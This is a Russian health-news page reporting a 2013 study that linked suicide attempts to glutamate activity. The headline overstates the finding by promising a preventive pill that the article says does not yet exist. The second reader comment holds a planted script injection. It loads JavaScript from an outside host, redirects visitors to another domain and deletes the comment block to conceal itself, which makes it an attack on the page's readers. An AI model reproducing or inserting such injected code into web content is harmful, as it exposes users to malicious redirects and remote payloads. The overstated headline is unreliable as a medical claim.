Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Всего одна таблетка позво...  >>  Всего одна таблетка позволяет предотвратить самоубийство
 
Обратная связь
 

Всего одна таблетка позволяет предотвратить самоубийство

Размер шрифта
23 января 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Американские ученые установили, что суицидальное поведение связано с повышенной активностью глутаминовой кислоты в головном мозге.

всего одна таблетка позволяет предотвратить самоубийство

Глутаминовая кислота – это аминокислота, благодаря которой осуществляется связь между нервными клетками. На протяжении 40 лет ученые полагали, что суицидальное поведение связано с другим веществом – серотонином. Однако новые данные свидетельствуют о неоспоримой роли глутаминовой кислоты.

В исследовании приняли участие 100 человек, которым измеряли активность глутаминовой кислоты. Ее активность определялась по концентрации хинолиновой кислоты в спинномозговой жидкости. 2/3 участников исследования были доставлены в больницу после суицидальной попытки, остальные участники были здоровы.

Оказалось, что концентрация хинолиновой кислоты в спинномозговой жидкости лиц, совершивших суицидальную попытку, в два раза выше, чем у здоровых людей, что указывает на более высокую активность глутаминовой кислоты. Наиболее высокая концентрация хинолиновой кислоты наблюдалась у тех участников, которые имели непреодолимое желание совершить самоубийство.

«Полученные результаты позволят разработать и внедрить в клиническую практику препараты, направленные на подавление активности глутаминовой кислоты. С помощью этих препаратов мы сможем эффективно лечить депрессию и предотвращать суицидальные попытки», – поясняет один из авторов исследования Лена Брундин.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

27 января 2013 в 14:29

Цитировать   |   Пожаловаться

Хорошо, что ученые нашли источник этого явления и благодаря таким таблеткам удастся предотвратить многие самоубийства. Вот только как понять, что такую чудо таблетку надо принять - я не понимаю.. 

2 - zzzzzz

30 июня 2015 в 23:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как мы реагируем на стресс   Переедание приводит к самоубийству! Что делать?   Кошки – причина суицида?!   Все что надо знать о бронхите  
22 января 2013Всего одна таблетка позволяет предотвратить самоубийство 19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 

Слайдшоу

1
Есть ли у вас перепады настроения?
Что скрывает головная боль
Руководство по предотвращению инсульта

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.